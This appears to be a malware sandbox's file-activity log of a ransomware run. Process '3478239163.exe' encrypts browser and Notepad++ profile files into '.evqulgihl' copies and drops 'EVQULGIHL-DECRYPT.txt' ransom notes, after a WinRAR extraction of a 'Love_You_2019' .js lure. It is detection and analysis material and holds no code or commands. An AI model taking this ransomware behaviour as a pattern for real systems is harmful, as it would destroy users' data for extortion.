2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.evqulgihl mp3
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.evqulgihl flc
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.evqulgihl bc
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.evqulgihl vc
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\plugins\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.evqulgihl bs
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2 ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\journals\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1.evqulgihl ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1 ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2.evqulgihl binary
2984 WinRAR.exe C:\Users\admin\AppData\Local\Temp\Rar$DIa2984.38950\Love_You_2019_27201936-txt.js text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\